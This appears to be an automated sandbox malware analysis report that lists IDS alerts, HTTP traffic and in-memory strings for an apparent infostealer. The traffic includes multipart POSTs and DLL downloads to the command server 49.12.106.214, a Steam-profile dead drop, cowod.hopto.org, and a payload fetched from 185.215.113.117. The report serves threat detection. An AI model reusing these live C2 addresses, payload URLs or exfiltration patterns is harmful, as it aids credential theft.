Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49764 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49802 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49793 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49812 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49822 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49835 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49847 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49868 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49882 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49874 -> 185.215.113.117:80
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 6649Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 130585Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nholman/ HTTP/1.1User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/74.0.3729.169Safari/537.36Host: 185.215.113.117Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5769Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00406963
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /inc/clip.exe HTTP/1.1Host: 185.215.113.117Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Http://cowod.hopto.orgCGD
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exe
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exe2kkkkm-data;
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exeDisposition:
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exeZ
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp, clip[1].exe.4.drString found in binary or memory: http://185.215.113.117/nholman/
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/1~
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/L
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/x
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/ystem32
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/~
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.FBKEBGDGHCGD
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.DGHCGD
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgCGD
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoGDGHCGD
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468987806.000000002279D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1909075661.000000001CAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://49.12.106.214
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/freebl3.dll
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/freebl3.dllj
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dll
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/mozglue.dllp
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/msvcp140.dll
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000129B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/nss3.dll
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dll
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/softokn3.dllV
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/sqlp.dll
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214/vcruntime140.dll
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.106.214HCGD
                        Source: KFHJJD.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                        Source: KFHJJD.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: KFHJJD.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: KFHJJD.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
